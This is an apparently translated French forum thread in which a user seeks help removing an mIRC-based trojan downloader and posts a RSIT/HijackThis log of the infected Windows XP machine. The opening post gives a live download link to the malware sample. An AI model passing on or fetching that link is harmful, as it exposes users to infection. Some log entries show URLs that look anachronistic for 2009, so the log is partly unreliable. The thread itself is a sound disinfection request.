Virus downloader via mIRC

lml-mike, 487 posts, contributor
Hello,

I have a problem after inadvertently running a .exe.

It installed an IRC client that launches at every startup and automatically downloads trojans...

Since then my computer has been infected, and I need help to disinfect it properly.

The virus is available via this link. I imagine that by decompiling it you'll understand a bit better how it works...

*DO NOT CLICK IF YOU DON'T KNOW HOW TO DECOMPILE A .EXE!*
http://lmlmike.free.fr/virus.zip
*DO NOT CLICK IF YOU DON'T KNOW HOW TO DECOMPILE A .EXE!*

Thanks for your help!

25 replies

Lyonnais92, 25708 posts, security contributor

Hello,

to make a dangerous link harmless, you write it as hxxp instead of http.

But reporting it is already a good reflex.

Thanks for your caution.

=====================
Download here:

http://images.malwareremoval.com/random/RSIT.exe

random's system information tool (RSIT) by random/random, and save it to the Desktop.

Double-click RSIT.exe to launch RSIT.

Read the contents of the Disclaimer screen, then click Continue (if you accept the conditions).

If HijackThis (up-to-date version) is not present or not detected on the computer, RSIT will download it (allow access in your firewall if asked) and you will have to accept the licence.

When the scan is finished, two text files will open.

Post the contents of log.txt (which will be displayed).

NB: The reports are saved in the folder C:\rsit
lml-mike, 487 posts, contributor

Thanks for taking care of my case and for the info, I'll remember it!

Here is the HijackThis report:

Logfile of random's system information tool 1.05 (written by random/random)
Run by lml-mike at 2009-03-17 12:41:55
Microsoft Windows XP Professionnel Service Pack 3
System drive C: has 3 GB (14%) free of 20 GB
Total RAM: 3007 MB (74% free)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:42:10, on 17/03/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16791)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Fichiers communs\Autodesk Shared\Service\AdskScSrv.exe
C:\Logs\Diskeeper\DkService.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Fichiers communs\LightScribe\LSSrvc.exe
V:\Logs\3dsMax8\mentalray\satellite\raysat_3dsmax8server.exe
C:\Program Files\Microsoft LifeCam\MSCamSvc.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\Analog Devices\Core\smax4pnp.exe
C:\Logs\Winamp\winampa.exe
C:\Logs\DU Meter\DUMeter.exe
C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
C:\WINDOWS\vVX6000.exe
C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb07.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Program Files\Java\jre6\bin\jusched.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\Program Files\Fichiers communs\Ahead\Lib\NMBgMonitor.exe
C:\Logs\Winamp Remote\bin\OrbTray.exe
C:\Logs\SuperCopier2\SuperCopier2.exe
C:\Logs\Nokia\Nokia PC Suite 7\PCSuite.exe
C:\Program Files\Fichiers communs\Ahead\Lib\NMIndexStoreSvr.exe
C:\Logs\Winamp Remote\bin\Orb.exe
C:\WINDOWS\system32\wbem\wmiapsrv.exe
C:\WINDOWS\System32\alg.exe
C:\Program Files\Fichiers communs\Ahead\Lib\NMIndexingService.exe
C:\Program Files\PC Connectivity Solution\ServiceLayer.exe
C:\Program Files\PC Connectivity Solution\Transports\NclUSBSrv.exe
C:\Program Files\PC Connectivity Solution\Transports\NclRSSrv.exe
C:\Program Files\Windows Live\Contacts\wlcomm.exe
C:\WINDOWS\System32\svchost.exe
C:\logs\avg\avgtray.exe
C:\logs\avg\avgwdsvc.exe
C:\logs\avg\avgam.exe
C:\logs\avg\avgrsx.exe
C:\Logs\mIRC\mirc.exe
C:\Logs\Mozilla Firefox\firefox.exe
C:\Documents and Settings\lml-mike\Bureau\RSIT.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files\trend micro\lml-mike.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www1.mini20.com/?tm=1&kw=Secure+Web+Search+Engine&KW1=Secure%20Web%20Search%20Engine&KW2=Best%20Malware%20Detection%20And%20Removal%20Software&searchbox=0&domainname=0&backfill=0
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = https://www.msn.com/fr-fr/?ocid=iehp
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = https://www.bing.com/?toHttps=1&redig=5FC791212101479BAFBE1A679848B1AF
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.msn.com/fr-fr/?ocid=iehp
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
O2 - BHO: G DATA WebFilter Class - {0124123D-61B4-456f-AF86-78C53A0790C5} - (no file)
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
O2 - BHO: Programme d'aide de l'Assistant de connexion Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Fichiers communs\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: (no name) - {0124123D-61B4-456f-AF86-78C53A0790C5} - (no file)
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\Core\smax4pnp.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [WinampAgent] C:\Logs\Winamp\winampa.exe
O4 - HKLM\..\Run: [DU Meter] C:\Logs\DU Meter\DUMeter.exe
O4 - HKLM\..\Run: [DiskeeperSystray] "C:\Logs\Diskeeper\DkIcon.exe"
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Fichiers communs\Ahead\Lib\NeroCheck.exe
O4 - HKLM\..\Run: [LifeCam] "C:\Program Files\Microsoft LifeCam\LifeExp.exe"
O4 - HKLM\..\Run: [VX6000] C:\WINDOWS\vVX6000.exe
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb07.exe
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Logs\QuickTime Alternative\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [AVG8_TRAY] C:\logs\avg\avgtray.exe
O4 - HKLM\..\Run: [mirc] C:\WINDOWS\Winend\mirc.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Fichiers communs\Ahead\Lib\NMBgMonitor.exe"
O4 - HKCU\..\Run: [Orb] "C:\Logs\Winamp Remote\bin\OrbTray.exe" /background
O4 - HKCU\..\Run: [SuperCopier2.exe] C:\Logs\SuperCopier2\SuperCopier2.exe
O4 - HKCU\..\Run: [PC Suite Tray] "C:\Logs\Nokia\Nokia PC Suite 7\PCSuite.exe" -onlytray
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SERVICE RÉSEAU')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~4\Office12\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre6\bin\jp2iexp.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre6\bin\jp2iexp.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~4\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/...
O17 - HKLM\System\CCS\Services\Tcpip\..\{8F84AFEF-B3CB-49E5-9B29-54622F44CD90}: NameServer = 192.168.1.1
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\FICHIE~1\Skype\SKYPE4~1.DLL
O20 - AppInit_DLLs: antbve.dll
O20 - Winlogon Notify: avgrsstarter - C:\WINDOWS\SYSTEM32\avgrsstx.dll
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Fichiers communs\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Autodesk Licensing Service - Autodesk - C:\Program Files\Fichiers communs\Autodesk Shared\Service\AdskScSrv.exe
O23 - Service: AVG8 WatchDog (avg8wd) - AVG Technologies CZ, s.r.o. - C:\logs\avg\avgwdsvc.exe
O23 - Service: Diskeeper - Executive Software International, Inc. - C:\Logs\Diskeeper\DkService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Fichiers communs\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Fichiers communs\LightScribe\LSSrvc.exe
O23 - Service: RaySat_3dsmax8 Server (mi-raysat_3dsmax8) - Unknown owner - V:\Logs\3dsMax8\mentalray\satellite\raysat_3dsmax8server.exe
O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Fichiers communs\Ahead\Lib\NMIndexingService.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - CACE Technologies - C:\Program Files\WinPcap\rpcapd.exe
O23 - Service: ServiceLayer - Nokia. - C:\Program Files\PC Connectivity Solution\ServiceLayer.exe

--
End of file - 8948 bytes

======Scheduled tasks folder======

C:\WINDOWS\tasks\AppleSoftwareUpdate.job

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0124123D-61B4-456f-AF86-78C53A0790C5}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5C255C8A-E604-49b4-9D64-90988571CECB}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
SSVHelper Class - C:\Program Files\Java\jre6\bin\ssv.dll [2008-11-10 320920]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}]
Programme d'aide de l'Assistant de connexion Windows Live - C:\Program Files\Fichiers communs\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-01-22 408448]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre6\bin\jp2ssv.dll [2008-11-10 34816]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
JQSIEStartDetectorImpl Class - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll [2008-11-10 73728]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
{0124123D-61B4-456f-AF86-78C53A0790C5}

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SoundMAXPnP"=C:\Program Files\Analog Devices\Core\smax4pnp.exe [2006-12-18 868352]
"NvCplDaemon"=C:\WINDOWS\system32\NvCpl.dll [2008-10-07 13574144]
"nwiz"=nwiz.exe /install []
"WinampAgent"=C:\Logs\Winamp\winampa.exe [2008-04-01 36352]
"DU Meter"=C:\Logs\DU Meter\DUMeter.exe [2003-06-22 1303552]
"DiskeeperSystray"=C:\Logs\Diskeeper\DkIcon.exe [2004-10-04 176216]
"NeroFilterCheck"=C:\Program Files\Fichiers communs\Ahead\Lib\NeroCheck.exe [2006-01-12 155648]
"LifeCam"=C:\Program Files\Microsoft LifeCam\LifeExp.exe [2006-06-30 269104]
"VX6000"=C:\WINDOWS\vVX6000.exe [2006-06-30 994096]
"HPDJ Taskbar Utility"=C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb07.exe [2003-03-09 188416]
"NvMediaCenter"=C:\WINDOWS\system32\NvMcTray.dll [2008-10-07 86016]
"SunJavaUpdateSched"=C:\Program Files\Java\jre6\bin\jusched.exe [2008-11-10 136600]
"QuickTime Task"=C:\Logs\QuickTime Alternative\QTTask.exe [2009-01-05 413696]
"AVG8_TRAY"=C:\logs\avg\avgtray.exe [2009-03-17 1932568]
"mirc"=C:\WINDOWS\Winend\mirc.exe [2006-11-23 2076672]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"=C:\WINDOWS\system32\ctfmon.exe [2008-04-13 15360]
"msnmsgr"=C:\Program Files\Windows Live\Messenger\msnmsgr.exe [2009-02-06 3885408]
"BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"=C:\Program Files\Fichiers communs\Ahead\Lib\NMBgMonitor.exe [2006-12-23 143360]
"Orb"=C:\Logs\Winamp Remote\bin\OrbTray.exe [2008-04-01 507904]
"SuperCopier2.exe"=C:\Logs\SuperCopier2\SuperCopier2.exe [2006-07-07 1052672]
"PC Suite Tray"=C:\Logs\Nokia\Nokia PC Suite 7\PCSuite.exe [2008-12-03 1205760]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLS"="antbve.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\avgrsstarter]
C:\WINDOWS\system32\avgrsstx.dll [2009-03-17 10520]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WgaLogon]
C:\WINDOWS\system32\WgaLogon.dll [2008-09-05 267304]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll [2006-10-18 133632]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\nm]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\nm.sys]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveTypeAutoRun"=145

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"HonorAutoRunSetting"=

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"C:\Documents and Settings\lml-mike\Bureau\temp\kav2k9\setup.exe"="C:\Documents and Settings\lml-mike\Bureau\temp\kav2k9\setup.exe:*:Enabled:Programme d'installation de Kaspersky Anti-Virus 2009"
"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"V:\Steam\SteamApps\lml_mike@hotmail.com\counter-strike source\hl2.exe"="V:\Steam\SteamApps\lml_mike@hotmail.com\counter-strike source\hl2.exe:*:Enabled:hl2"
"C:\Logs\HLSW\hlsw.exe"="C:\Logs\HLSW\hlsw.exe:*:Enabled:HLSW Application"
"C:\Logs\ABC\abc.exe"="C:\Logs\ABC\abc.exe:*:Enabled:abc"
"V:\Steam\steam.exe"="V:\Steam\steam.exe:*:Enabled:Steam"
"C:\Program Files\Fichiers communs\Nokia\Service Layer\A\nsl_host_process.exe"="C:\Program Files\Fichiers communs\Nokia\Service Layer\A\nsl_host_process.exe:*:Enabled:Nokia Service Layer Host Process "
"C:\Program Files\Nokia\Nokia Software Updater\nsu_ui_client.exe"="C:\Program Files\Nokia\Nokia Software Updater\nsu_ui_client.exe:*:Enabled:Nokia Software Updater"
"C:\WINDOWS\system32\mmc.exe"="C:\WINDOWS\system32\mmc.exe:*:Enabled:Microsoft Management Console"
"V:\eMule\emule.exe"="V:\eMule\emule.exe:*:Enabled:eMule"
"C:\Program Files\Microsoft LifeCam\LifeCam.exe"="C:\Program Files\Microsoft LifeCam\LifeCam.exe:*:Enabled:LifeCam.exe"
"C:\Program Files\Microsoft LifeCam\LifeExp.exe"="C:\Program Files\Microsoft LifeCam\LifeExp.exe:*:Enabled:LifeExp.exe"
"C:\WINDOWS\system32\rundll32.exe"="C:\WINDOWS\system32\rundll32.exe:*:Enabled:Exécuter une DLL en tant qu'application"
"V:\Quake III Arena\quake3.exe"="V:\Quake III Arena\quake3.exe:*:Enabled:quake3"
"V:\Warcraft III\Warcraft III\Warcraft III.exe"="V:\Warcraft III\Warcraft III\Warcraft III.exe:*:Enabled:Warcraft III"
"C:\Logs\Mozilla Firefox\firefox.exe"="C:\Logs\Mozilla Firefox\firefox.exe:*:Enabled:Firefox"
"C:\Logs\FlashFXP\flashfxp.exe"="C:\Logs\FlashFXP\flashfxp.exe:*:Enabled:FlashFXP"
"V:\Steam\SteamApps\lml_mike@hotmail.com\condition zero\hl.exe"="V:\Steam\SteamApps\lml_mike@hotmail.com\condition zero\hl.exe:*:Enabled:Half-Life Launcher"
"V:\Steam\SteamApps\lml_mike@hotmail.com\condition zero deleted scenes\hl.exe"="V:\Steam\SteamApps\lml_mike@hotmail.com\condition zero deleted scenes\hl.exe:*:Enabled:Half-Life Launcher"
"V:\Steam\SteamApps\lml_mike@hotmail.com\half-life\hl.exe"="V:\Steam\SteamApps\lml_mike@hotmail.com\half-life\hl.exe:*:Enabled:Half-Life Launcher"
"C:\Logs\Mumble\mumble1.1.3\murmur.exe"="C:\Logs\Mumble\mumble1.1.3\murmur.exe:*:Enabled:murmur"
"V:\cod4\iw3mp.exe"="V:\cod4\iw3mp.exe:*:Enabled:iw3mp"
"V:\css\hl2.exe"="V:\css\hl2.exe:*:Enabled:hl2"
"C:\Logs\Winamp Remote\bin\Orb.exe"="C:\Logs\Winamp Remote\bin\Orb.exe:*:Enabled:Orb"
"C:\Logs\Winamp Remote\bin\OrbTray.exe"="C:\Logs\Winamp Remote\bin\OrbTray.exe:*:Enabled:OrbTray"
"C:\Logs\Winamp Remote\bin\OrbStreamerClient.exe"="C:\Logs\Winamp Remote\bin\OrbStreamerClient.exe:*:Enabled:Orb Stream Client"
"V:\Warcraft III\Warcraft III\Frozen Throne.exe"="V:\Warcraft III\Warcraft III\Frozen Throne.exe:*:Enabled:Frozen Throne.exe"
"V:\Logs\backburner\monitor.exe"="V:\Logs\backburner\monitor.exe:*:Enabled:backburner 2.3 monitor"
"V:\Logs\backburner\manager.exe"="V:\Logs\backburner\manager.exe:*:Enabled:backburner 2.3 manager"
"V:\Logs\backburner\server.exe"="V:\Logs\backburner\server.exe:*:Enabled:backburner 2.3 server"
"V:\Warcraft III\Warcraft III.exe"="V:\Warcraft III\Warcraft III.exe:*:Enabled:Warcraft III"
"V:\Steam\SteamApps\lml_mike@hotmail.com\half-life 2 deathmatch\hl2.exe"="V:\Steam\SteamApps\lml_mike@hotmail.com\half-life 2 deathmatch\hl2.exe:*:Enabled:hl2"
"V:\Warcraft III\Frozen Throne.exe"="V:\Warcraft III\Frozen Throne.exe:*:Enabled:Warcraft III - The Frozen Throne"
"C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE"="C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE:*:Enabled:Microsoft Office Outlook"
"V:\Steam\SteamApps\lml_mike@hotmail.com\synergy\hl2.exe"="V:\Steam\SteamApps\lml_mike@hotmail.com\synergy\hl2.exe:*:Enabled:hl2"
"V:\Steam\SteamApps\lml_mike@hotmail.com\zombie panic! source\hl2.exe"="V:\Steam\SteamApps\lml_mike@hotmail.com\zombie panic! source\hl2.exe:*:Enabled:hl2"
"C:\Logs\mIRC\mirc.exe"="C:\Logs\mIRC\mirc.exe:*:Enabled:mIRC"
"V:\Steam\SteamApps\common\left 4 dead demo\srcds.exe"="V:\Steam\SteamApps\common\left 4 dead demo\srcds.exe:*:Enabled:srcds"
"C:\Program Files\Java\jre6\bin\java.exe"="C:\Program Files\Java\jre6\bin\java.exe:*:Enabled:Java(TM) Platform SE binary"
"C:\Documents and Settings\All Users\Application Data\Kaspersky Lab Setup Files\Kaspersky Internet Security 2009\English\setup.exe"="C:\Documents and Settings\All Users\Application Data\Kaspersky Lab Setup Files\Kaspersky Internet Security 2009\English\setup.exe:*:Enabled:Kaspersky Internet Security 2009 Setup"
"V:\Shaun White Snowboarding\ShaunWhiteSnowboardingGame.exe"="V:\Shaun White Snowboarding\ShaunWhiteSnowboardingGame.exe:*:Enabled:Shaun White Snowboarding Game"
"V:\Shaun White Snowboarding\ShaunWhiteSnowboarding.exe"="V:\Shaun White Snowboarding\ShaunWhiteSnowboarding.exe:*:Enabled:Shaun White Snowboarding Update"
"C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"
"C:\Logs\avg\avgam.exe"="C:\Logs\avg\avgam.exe:*:Enabled:avgam.exe"
"C:\Logs\avg\avgupd.exe"="C:\Logs\avg\avgupd.exe:*:Enabled:avgupd.exe"
"C:\Documents and Settings\lml-mike\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\octoshape\octoshape.exe"="C:\Documents and Settings\lml-mike\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\octoshape\octoshape.exe:*:Enabled:Octoshape add-in for Adobe Flash Player"
"P:\Prince of Persia\Prince of Persia.exe"="P:\Prince of Persia\Prince of Persia.exe:*:Enabled:Prince of Persia Dx"
"P:\Prince of Persia\PrinceOfPersia_Launcher.exe"="P:\Prince of Persia\PrinceOfPersia_Launcher.exe:*:Enabled:Prince of Persia Update"
"C:\Program Files\Skype\Phone\Skype.exe"="C:\Program Files\Skype\Phone\Skype.exe:*:Enabled:Skype"
"P:\Mirror's Edge\Binaries\MirrorsEdge.exe"="P:\Mirror's Edge\Binaries\MirrorsEdge.exe:*:Enabled:Mirror's Edge™"
"C:\WINDOWS\Winend\mirc.exe"="C:\WINDOWS\Winend\mirc.exe:*:Disabled:mIRC"
"V:\Steam\SteamApps\common\left 4 dead\left4dead.exe"="V:\Steam\SteamApps\common\left 4 dead\left4dead.exe:*:Enabled:Left 4 Dead"

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"

======File associations======

.reg - open - "regedit.exe" "%1"

======List of files/folders created in the last 1 months======

2009-03-17 12:41:56 ----D---- C:\Program Files\trend micro
2009-03-17 12:41:55 ----D---- C:\rsit
2009-03-17 03:01:50 ----HDC---- C:\WINDOWS\$NtUninstallKB960225$
2009-03-17 03:01:43 ----HDC---- C:\WINDOWS\$NtUninstallKB958690$
2009-03-17 03:01:18 ----HDC---- C:\WINDOWS\$NtUninstallKB959772_WM11$
2009-03-09 13:11:53 ----D---- C:\WINDOWS\Winend
2009-03-03 18:39:31 ----N---- C:\WINDOWS\IsUninst.Exe
2009-03-03 18:38:36 ----A---- C:\WINDOWS\IsUn040c.exe
2009-03-01 13:58:44 ----A---- C:\WINDOWS\system32\CmdLineExt03.dll
2009-03-01 12:08:27 ----HD---- C:\$AVG8.VAULT$
2009-02-28 16:11:34 ----A---- C:\WINDOWS\system32\avgrsstx.dll.old
2009-02-28 16:11:34 ----A---- C:\WINDOWS\system32\avgrsstx.dll
2009-02-28 16:11:21 ----D---- C:\Program Files\AVG
2009-02-28 03:00:31 ----HDC---- C:\WINDOWS\$NtUninstallKB967715$
2009-02-21 08:48:18 ----D---- C:\Documents and Settings\lml-mike\Application Data\DeepBurner
2009-02-20 16:12:39 ----A---- C:\WINDOWS\NAVIGMA.INI

======List of files/folders modified in the last 1 months======

2009-03-17 12:41:58 ----D---- C:\WINDOWS\Prefetch
2009-03-17 12:41:56 ----RD---- C:\Program Files
2009-03-17 12:40:18 ----D---- C:\Documents and Settings\lml-mike\Application Data\mIRC
2009-03-17 08:35:56 ----D---- C:\WINDOWS\system32\drivers
2009-03-17 08:35:43 ----D---- C:\WINDOWS\system32
2009-03-17 03:59:21 ----D---- C:\WINDOWS\Temp
2009-03-17 03:59:14 ----D---- C:\WINDOWS
2009-03-17 03:58:00 ----A---- C:\WINDOWS\SchedLgU.Txt
2009-03-17 03:01:53 ----HD---- C:\WINDOWS\inf
2009-03-17 03:01:52 ----RSHDC---- C:\WINDOWS\system32\dllcache
2009-03-17 03:01:47 ----A---- C:\WINDOWS\imsins.BAK
2009-03-17 03:01:31 ----D---- C:\WINDOWS\system32\CatRoot2
2009-03-17 03:01:12 ----SHD---- C:\WINDOWS\Installer
2009-03-17 03:01:09 ----D---- C:\Documents and Settings\All Users\Application Data\Microsoft Help
2009-03-17 00:41:12 ----D---- C:\Documents and Settings\lml-mike\Application Data\teamspeak2
2009-03-16 15:57:04 ----HD---- C:\WINDOWS\$hf_mig$
2009-03-09 04:24:15 ----A---- C:\WINDOWS\NeroDigital.ini
2009-03-09 03:46:36 ----D---- C:\WINDOWS\system32\DirectX
2009-03-09 03:46:21 ----RSD---- C:\WINDOWS\assembly
2009-03-09 03:44:24 ----D---- C:\Program Files\Fichiers communs\Wise Installation Wizard
2009-03-09 03:44:12 ----D---- C:\Program Files\AGEIA Technologies
2009-03-09 03:43:23 ----D---- C:\Documents and Settings\lml-mike\Application Data\HLSW
2009-03-08 21:07:04 ----D---- C:\Documents and Settings\lml-mike\Application Data\Skype
2009-03-08 21:00:06 ----D---- C:\Documents and Settings\lml-mike\Application Data\skypePM
2009-03-08 01:11:30 ----A---- C:\WINDOWS\system32\wrap_oal.dll
2009-03-08 01:11:30 ----A---- C:\WINDOWS\system32\OpenAL32.dll
2009-03-06 20:54:12 ----D---- C:\Documents and Settings\lml-mike\Application Data\Mumble
